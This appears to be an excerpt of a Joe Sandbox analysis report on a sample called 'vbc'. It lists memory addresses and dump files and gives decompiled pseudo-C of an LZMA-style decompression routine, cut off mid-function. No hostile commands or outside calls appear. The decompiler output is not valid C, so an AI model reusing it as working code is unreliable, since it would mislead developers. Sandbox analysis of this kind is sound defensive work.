                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00406abf
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00000000
                                                0x00000000
                                                0x00406c4a
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5a
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00406c85
                                                0x00406c85
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00406c88
                                                0x00406c88
                                                0x00000000
                                                0x00406c88
                                                0x00406f09
                                                0x0040713e
                                                0x00407160
                                                0x00407166
                                                0x00407168
                                                0x0040716f
                                                0x00407171
                                                0x00407178
                                                0x0040717c
                                                0x00000000
                                                0x0040676d
                                                0x00407175
                                                0x00407175
                                                0x00000000
                                                0x00407175
                                                0x00406fc2
                                                0x00407048
                                                0x0040704e
                                                0x00407051
                                                0x00407054
                                                0x00407057
                                                0x0040705a
                                                0x0040705d
                                                0x00407060
                                                0x00407063
                                                0x00407069
                                                0x00407082
                                                0x00407085
                                                0x00407088
                                                0x0040708b
                                                0x0040708f
                                                0x00407091
                                                0x00407092
                                                0x00407095
                                                0x0040706b
                                                0x0040706b
                                                0x00407073
                                                0x00407078
                                                0x0040707a
                                                0x0040707d
                                                0x0040707d
                                                0x0040709f
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x004070a1
                                                0x0040709f
                                                0x00000000
                                                0x00406f14

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
                                                • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406C26() {
                                                				unsigned short _t532;
                                                				signed int _t533;
                                                				void _t534;
                                                				void* _t535;
                                                				signed int _t536;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						L89:
                                                						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                						L69:
                                                						_t606 =  *(_t613 - 0x58);
                                                						 *(_t613 - 0x84) = 0x12;
                                                						L132:
                                                						 *(_t613 - 0x54) = _t606;
                                                						L133:
                                                						_t532 =  *_t606;
                                                						_t589 = _t532 & 0x0000ffff;
                                                						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                						if( *(_t613 - 0xc) >= _t565) {
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                							 *(_t613 - 0x40) = 1;
                                                							_t533 = _t532 - (_t532 >> 5);
                                                							 *_t606 = _t533;
                                                						} else {
                                                							 *(_t613 - 0x10) = _t565;
                                                							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                						}
                                                						if( *(_t613 - 0x10) >= 0x1000000) {
                                                							L139:
                                                							_t534 =  *(_t613 - 0x84);
                                                							L140:
                                                							 *(_t613 - 0x88) = _t534;
                                                							goto L1;
                                                						} else {
                                                							L137:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 5;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							goto L139;
                                                						}
                                                					} else {
                                                						if( *(__ebp - 0x60) == 0) {
                                                							L171:
                                                							_t536 = _t535 | 0xffffffff;
                                                							L172:
                                                							return _t536;
                                                						}
                                                						__eax = 0;
                                                						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                						0 | _t258 = _t258 + _t258 + 9;
                                                						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                						L75:
                                                						if( *(__ebp - 0x64) == 0) {
                                                							 *(__ebp - 0x88) = 0x1b;
                                                							L170:
                                                							_t568 = 0x22;
                                                							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                							_t536 = 0;
                                                							goto L172;
                                                						}
                                                						__eax =  *(__ebp - 0x14);
                                                						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                						if(__eax >=  *(__ebp - 0x74)) {
                                                							__eax = __eax +  *(__ebp - 0x74);
                                                						}
                                                						__edx =  *(__ebp - 8);
                                                						__cl =  *(__eax + __edx);
                                                						__eax =  *(__ebp - 0x14);
                                                						 *(__ebp - 0x5c) = __cl;
                                                						 *(__eax + __edx) = __cl;
                                                						__eax = __eax + 1;
                                                						__edx = 0;
                                                						_t274 = __eax %  *(__ebp - 0x74);
                                                						__eax = __eax /  *(__ebp - 0x74);
                                                						__edx = _t274;
                                                						__eax =  *(__ebp - 0x68);
                                                						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                						_t283 = __ebp - 0x64;
                                                						 *_t283 =  *(__ebp - 0x64) - 1;
                                                						 *( *(__ebp - 0x68)) = __cl;
                                                						L79:
                                                						 *(__ebp - 0x14) = __edx;
                                                						L80:
                                                						 *(__ebp - 0x88) = 2;
                                                					}
                                                					L1:
                                                					_t535 =  *(_t613 - 0x88);
                                                					if(_t535 > 0x1c) {
                                                						goto L171;
                                                					}
                                                					switch( *((intOrPtr*)(_t535 * 4 +  &M0040717D))) {
                                                						case 0:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							_t535 =  *( *(_t613 - 0x70));
                                                							if(_t535 > 0xe1) {
                                                								goto L171;
                                                							}
                                                							_t539 = _t535 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t570);
                                                							_push(9);
                                                							_pop(_t571);
                                                							_t609 = _t539 / _t570;
                                                							_t541 = _t539 % _t570 & 0x000000ff;
                                                							asm("cdq");
                                                							_t604 = _t541 % _t571 & 0x000000ff;
                                                							 *(_t613 - 0x3c) = _t604;
                                                							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                								L10:
                                                								if(_t612 == 0) {
                                                									L12:
                                                									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                									goto L15;
                                                								} else {
                                                									goto L11;
                                                								}
                                                								do {
                                                									L11:
                                                									_t612 = _t612 - 1;
                                                									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                								} while (_t612 != 0);
                                                								goto L12;
                                                							}
                                                							if( *(_t613 - 4) != 0) {
                                                								GlobalFree( *(_t613 - 4));
                                                							}
                                                							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                							 *(_t613 - 4) = _t535;
                                                							if(_t535 == 0) {
                                                								goto L171;
                                                							} else {
                                                								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                								goto L10;
                                                							}
                                                						case 1:
                                                							L13:
                                                							__eflags =  *(_t613 - 0x6c);
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 1;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							_t45 = _t613 - 0x48;
                                                							 *_t45 =  *(_t613 - 0x48) + 1;
                                                							__eflags =  *_t45;
                                                							L15:
                                                							if( *(_t613 - 0x48) < 4) {
                                                								goto L13;
                                                							}
                                                							_t547 =  *(_t613 - 0x40);
                                                							if(_t547 ==  *(_t613 - 0x74)) {
                                                								L20:
                                                								 *(_t613 - 0x48) = 5;
                                                								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                								goto L23;
                                                							}
                                                							 *(_t613 - 0x74) = _t547;
                                                							if( *(_t613 - 8) != 0) {
                                                								GlobalFree( *(_t613 - 8));
                                                							}
                                                							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                							 *(_t613 - 8) = _t535;
                                                							if(_t535 == 0) {
                                                								goto L171;
                                                							} else {
                                                								goto L20;
                                                							}
                                                						case 2:
                                                							L24:
                                                							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                							 *(_t613 - 0x84) = 6;
                                                							 *(_t613 - 0x4c) = _t554;
                                                							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                							goto L132;
                                                						case 3:
                                                							L21:
                                                							__eflags =  *(_t613 - 0x6c);
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 3;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							_t67 = _t613 - 0x70;
                                                							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                							__eflags =  *_t67;
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							L23:
                                                							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                							if( *(_t613 - 0x48) != 0) {
                                                								goto L21;
                                                							}
                                                							goto L24;
                                                						case 4:
                                                							goto L133;
                                                						case 5:
                                                							goto L137;
                                                						case 6:
                                                							__edx = 0;
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) = 1;
                                                								 *(__ebp - 0x84) = 7;
                                                								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                							__esi =  *(__ebp - 0x60);
                                                							__cl = 8;
                                                							__cl = 8 -  *(__ebp - 0x3c);
                                                							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                							__ecx =  *(__ebp - 0x3c);
                                                							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                							__ecx =  *(__ebp - 4);
                                                							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                							__eflags =  *(__ebp - 0x38) - 4;
                                                							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                							if( *(__ebp - 0x38) >= 4) {
                                                								__eflags =  *(__ebp - 0x38) - 0xa;
                                                								if( *(__ebp - 0x38) >= 0xa) {
                                                									_t98 = __ebp - 0x38;
                                                									 *_t98 =  *(__ebp - 0x38) - 6;
                                                									__eflags =  *_t98;
                                                								} else {
                                                									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                								}
                                                							} else {
                                                								 *(__ebp - 0x38) = 0;
                                                							}
                                                							__eflags =  *(__ebp - 0x34) - __edx;
                                                							if( *(__ebp - 0x34) == __edx) {
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								goto L61;
                                                							} else {
                                                								__eax =  *(__ebp - 0x14);
                                                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                								__eflags = __eax -  *(__ebp - 0x74);
                                                								if(__eax >=  *(__ebp - 0x74)) {
                                                									__eax = __eax +  *(__ebp - 0x74);
                                                									__eflags = __eax;
                                                								}
                                                								__ecx =  *(__ebp - 8);
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								__al =  *((intOrPtr*)(__eax + __ecx));
                                                								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                								goto L41;
                                                							}
                                                						case 7:
                                                							__eflags =  *(__ebp - 0x40) - 1;
                                                							if( *(__ebp - 0x40) != 1) {
                                                								__eax =  *(__ebp - 0x24);
                                                								 *(__ebp - 0x80) = 0x16;
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x28);
                                                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                								__eax =  *(__ebp - 0x2c);
                                                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                								__eax = 0;
                                                								__eflags =  *(__ebp - 0x38) - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                								__eax =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 4) + 0x664;
                                                								__eflags = __eax;
                                                								 *(__ebp - 0x58) = __eax;
                                                								goto L69;
                                                							}
                                                							__eax =  *(__ebp - 4);
                                                							__ecx =  *(__ebp - 0x38);
                                                							 *(__ebp - 0x84) = 8;
                                                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                							goto L132;
                                                						case 8:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xa;
                                                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                							} else {
                                                								__eax =  *(__ebp - 0x38);
                                                								__ecx =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 0x38) + 0xf;
                                                								 *(__ebp - 0x84) = 9;
                                                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                							}
                                                							goto L132;
                                                						case 9:
                                                							goto L0;
                                                						case 0xa:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xb;
                                                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x28);
                                                							goto L88;
                                                						case 0xb:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__ecx =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x20);
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                							} else {
                                                								__eax =  *(__ebp - 0x24);
                                                							}
                                                							__ecx =  *(__ebp - 0x28);
                                                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                							L88:
                                                							__ecx =  *(__ebp - 0x2c);
                                                							 *(__ebp - 0x2c) = __eax;
                                                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                							goto L89;
                                                						case 0xc:
                                                							L99:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xc;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t334 = __ebp - 0x70;
                                                							 *_t334 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t334;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							__eax =  *(__ebp - 0x2c);
                                                							goto L101;
                                                						case 0xd:
                                                							L37:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xd;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t122 = __ebp - 0x70;
                                                							 *_t122 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t122;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L39:
                                                							__eax =  *(__ebp - 0x40);
                                                							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                								goto L48;
                                                							}
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								goto L54;
                                                							}
                                                							L41:
                                                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                							 *(__ebp - 0x48) = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								 *(__ebp - 0x40) = 1;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L39;
                                                							} else {
                                                								goto L37;
                                                							}
                                                						case 0xe:
                                                							L46:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xe;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t156 = __ebp - 0x70;
                                                							 *_t156 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t156;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							while(1) {
                                                								L48:
                                                								__eflags = __ebx - 0x100;
                                                								if(__ebx >= 0x100) {
                                                									break;
                                                								}
                                                								__eax =  *(__ebp - 0x58);
                                                								__edx = __ebx + __ebx;
                                                								__ecx =  *(__ebp - 0x10);
                                                								__esi = __edx + __eax;
                                                								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                								__ax =  *__esi;
                                                								 *(__ebp - 0x54) = __esi;
                                                								__edi = __ax & 0x0000ffff;
                                                								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                								__eflags =  *(__ebp - 0xc) - __ecx;
                                                								if( *(__ebp - 0xc) >= __ecx) {
                                                									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                									__cx = __ax;
                                                									_t170 = __edx + 1; // 0x1
                                                									__ebx = _t170;
                                                									__cx = __ax >> 5;
                                                									__eflags = __eax;
                                                									 *__esi = __ax;
                                                								} else {
                                                									 *(__ebp - 0x10) = __ecx;
                                                									0x800 = 0x800 - __edi;
                                                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                									__ebx = __ebx + __ebx;
                                                									 *__esi = __cx;
                                                								}
                                                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                								 *(__ebp - 0x44) = __ebx;
                                                								if( *(__ebp - 0x10) >= 0x1000000) {
                                                									continue;
                                                								} else {
                                                									goto L46;
                                                								}
                                                							}
                                                							L54:
                                                							_t173 = __ebp - 0x34;
                                                							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                							__eflags =  *_t173;
                                                							goto L55;
                                                						case 0xf:
                                                							L58:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xf;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t203 = __ebp - 0x70;
                                                							 *_t203 =  *(__ebp - 0x70) + 1;
